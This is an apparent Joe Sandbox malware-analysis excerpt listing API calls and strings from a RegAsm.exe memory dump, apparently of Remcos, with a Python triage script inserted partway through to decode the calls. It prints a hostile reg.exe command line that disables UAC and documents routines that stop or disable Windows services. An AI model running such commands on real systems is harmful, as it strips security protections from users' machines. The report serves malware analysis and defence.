                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                        • String ID:
                                                        • API String ID: 493672254-0
                                                        • Opcode ID: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                                        • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                                                        • Opcode Fuzzy Hash: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                                        • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                        • _free.LIBCMT ref: 0044824C
                                                        • _free.LIBCMT ref: 00448274
                                                        • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                        • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                        • _abort.LIBCMT ref: 00448293
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$_free$_abort
                                                        • String ID:
                                                        • API String ID: 3160817290-0
                                                        • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                                        • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                                        • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                                        • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                        • String ID:
                                                        • API String ID: 221034970-0
                                                        • Opcode ID: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                                                        • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                                        • Opcode Fuzzy Hash: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                                                        • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                                        • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                        • String ID:
                                                        • API String ID: 221034970-0
                                                        • Opcode ID: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                                                        • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                                        • Opcode Fuzzy Hash: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                                                        • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                                                        • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                        • String ID:
                                                        • API String ID: 221034970-0
                                                        • Opcode ID: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                                                        • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                                                        • Opcode Fuzzy Hash: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                                                        • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ClassCreateErrorLastRegisterWindow
                                                        • String ID: 0$MsgWindowClass
                                                        • API String ID: 2877667751-2410386613
                                                        • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                                        • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                                        • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                                        • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                                        • CloseHandle.KERNEL32(?), ref: 004077AA
                                                        • CloseHandle.KERNEL32(?), ref: 004077AF
                                                        Strings
                                                        • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                                        • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseHandle$CreateProcess
                                                        • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                        • API String ID: 2922976086-4183131282
                                                        • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                                        • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                                        • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                                        • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%
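The service-control functions listed above (OpenServiceW/ControlService/ChangeServiceConfigW) and the CreateProcessA entry are only readable once the raw hex arguments are decoded: ControlService 1/2/3 are SERVICE_CONTROL_STOP/PAUSE/CONTINUE, ChangeServiceConfigW dwStartType 4 is SERVICE_DISABLED, the OpenServiceW access masks 0x2/0x20/0x40 are SERVICE_CHANGE_CONFIG/SERVICE_STOP/SERVICE_PAUSE_CONTINUE, CreateProcessA dwCreationFlags 0x08000000 is CREATE_NO_WINDOW, and the reg.exe command line writes EnableLUA=0 (UAC off after the next reboot). The following script is an added example, not part of the Joe Sandbox report or of the Remcos code it analyses: it parses entries in the report's "APIs" line format and emits those decoded findings. Assumptions, labelled in the code: arguments are split on commas (true for the entries shown, which contain no commas inside string arguments), and the 000000FF shown for dwServiceType/dwErrorControl is treated as SERVICE_NO_CHANGE (a sign-extended `push -1` rendered as a byte); the sample lines are constructed copies of entries from this page.

```python
import re

# Constructed sample input: API entries in the shape used by the report's
# "APIs" sections (RegAsm.exe memory dump, process 15).
SAMPLE_LINES = [
    r"• OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88",
    r"• OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9",
    r"• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE",
    r"• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5",
    r"• ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9",
    r"• ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50",
    r"• CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B",
    r"  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509",
]

# One report entry: "• Api.MODULE(arg,arg,...), ref: ADDR"; subcall notes do not match.
ENTRY_RE = re.compile(
    r"^\s*[•*]?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Win32 constants (advapi32 service API, kernel32 CreateProcess).
SERVICE_CONTROL = {1: "SERVICE_CONTROL_STOP", 2: "SERVICE_CONTROL_PAUSE",
                   3: "SERVICE_CONTROL_CONTINUE", 4: "SERVICE_CONTROL_INTERROGATE"}
SERVICE_START_TYPE = {0: "SERVICE_BOOT_START", 1: "SERVICE_SYSTEM_START",
                      2: "SERVICE_AUTO_START", 3: "SERVICE_DEMAND_START", 4: "SERVICE_DISABLED"}
SERVICE_ACCESS = {0x1: "SERVICE_QUERY_CONFIG", 0x2: "SERVICE_CHANGE_CONFIG",
                  0x4: "SERVICE_QUERY_STATUS", 0x10: "SERVICE_START",
                  0x20: "SERVICE_STOP", 0x40: "SERVICE_PAUSE_CONTINUE"}
# SERVICE_NO_CHANGE is 0xFFFFFFFF; assumption: the report prints a byte-sized
# "push -1" as 000000FF, so both spellings are accepted here.
SERVICE_NO_CHANGE = {0xFF, 0xFFFFFFFF}
CREATE_NO_WINDOW = 0x08000000


def parse_entry(line):
    """Split one report entry into api/module/args/ref, or None if it is not an entry."""
    m = ENTRY_RE.match(line)
    if not m:
        return None
    # Assumption: no commas inside string arguments (holds for the entries above).
    args = [a.strip() for a in m.group("args").split(",")]
    return {"api": m.group("api"), "module": m.group("module"), "args": args, "ref": m.group("ref")}


def as_int(arg):
    """Hex argument -> int; '?' (unresolved by the analyser) or non-hex text -> None."""
    if not re.fullmatch(r"[0-9A-Fa-f]{1,8}", arg):
        return None
    return int(arg, 16)


def access_names(value):
    """Render a service access mask as its SERVICE_* bit names."""
    if value is None:
        return "?"
    names = [name for bit, name in SERVICE_ACCESS.items() if value & bit]
    return "|".join(names) if names else f"0x{value:X}"


def decode(entry):
    """Turn the raw arguments of the interesting calls into a readable finding."""
    api, args = entry["api"], entry["args"]
    if api == "ControlService":
        code = as_int(args[1])                       # dwControl
        return f"ControlService dwControl={SERVICE_CONTROL.get(code, code)}"
    if api == "ChangeServiceConfigW":
        start = as_int(args[2])                      # dwStartType
        if start in SERVICE_NO_CHANGE:
            return "ChangeServiceConfigW dwStartType=SERVICE_NO_CHANGE"
        return f"ChangeServiceConfigW dwStartType={SERVICE_START_TYPE.get(start, start)}"
    if api == "OpenServiceW":
        return f"OpenServiceW dwDesiredAccess={access_names(as_int(args[2]))}"
    if api == "CreateProcessA":
        cmdline = args[1]                            # lpCommandLine
        hidden = as_int(args[5]) == CREATE_NO_WINDOW  # dwCreationFlags
        if re.search(r"EnableLUA\b.*\s/d\s+0\b", cmdline):
            return ("CreateProcessA: reg.exe sets EnableLUA=0 (UAC disabled after reboot)"
                    + (", CREATE_NO_WINDOW" if hidden else ""))
        return f"CreateProcessA cmdline={cmdline}"
    return None


def analyze(lines):
    """Return the decoded findings for every entry that decode() understands."""
    findings = []
    for line in lines:
        entry = parse_entry(line)
        if entry is None:
            continue
        text = decode(entry)
        if text:
            findings.append(text)
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LINES):
        print(finding)
```

Run against the sample, the output pairs each OpenServiceW access mask with the ControlService code that follows it in the same function (SERVICE_STOP with SERVICE_CONTROL_STOP, and so on), which is the pattern to look for when triaging similar service-tampering stubs in other dumps; the ChangeServiceConfigW call with dwStartType=SERVICE_DISABLED and the EnableLUA=0 command line are the two findings worth raising in a report.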

                                                        Strings
                                                        • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076C4
                                                        • SG, xrefs: 004076DA
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: SG$C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
                                                        • API String ID: 0-97610266
                                                        • Opcode ID: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                                                        • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                                        • Opcode Fuzzy Hash: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                                                        • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,004432EB,?,?,0044328B,?), ref: 0044336D
                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                                        • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                                        • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                                        • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                        • CloseHandle.KERNEL32(?), ref: 00405140
                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                        • String ID: KeepAlive | Disabled
                                                        • API String ID: 2993684571-305739064
                                                        • Opcode ID: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                                                        • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                                        • Opcode Fuzzy Hash: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                                                        • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                        • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                                                        • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                                                        • Sleep.KERNEL32(00002710), ref: 0041AE07
                                                        • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: PlaySound$HandleLocalModuleSleepTime
                                                        • String ID: Alarm triggered
                                                        • API String ID: 614609389-2816303416
                                                        • Opcode ID: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                                                        • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                                                        • Opcode Fuzzy Hash: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                                                        • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CD6F
                                                        • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CD7C
                                                        • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CD8F
                                                        Strings
                                                        • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                        • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                        • API String ID: 3024135584-2418719853
                                                        • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                                        • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                                                        • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                                        • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                                        • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                                        • Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                                        • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                        • _free.LIBCMT ref: 00444E06
                                                        • _free.LIBCMT ref: 00444E1D
                                                        • _free.LIBCMT ref: 00444E3C
                                                        • _free.LIBCMT ref: 00444E57
                                                        • _free.LIBCMT ref: 00444E6E
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$AllocateHeap
                                                        • String ID:
                                                        • API String ID: 3033488037-0
                                                        • Opcode ID: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
                                                        • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                                                        • Opcode Fuzzy Hash: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
                                                        • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                                        • _free.LIBCMT ref: 004493BD
                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                        • _free.LIBCMT ref: 00449589
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                        • String ID:
                                                        • API String ID: 1286116820-0
                                                        • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                                        • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                                                        • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                                        • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                                        • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                                          • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 4269425633-0
                                                        • Opcode ID: 050d440512ad4bd2d5c4b985fe1e5d11bc0defa287e01fcc1b5db6667af7a0db
                                                        • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                                        • Opcode Fuzzy Hash: 050d440512ad4bd2d5c4b985fe1e5d11bc0defa287e01fcc1b5db6667af7a0db
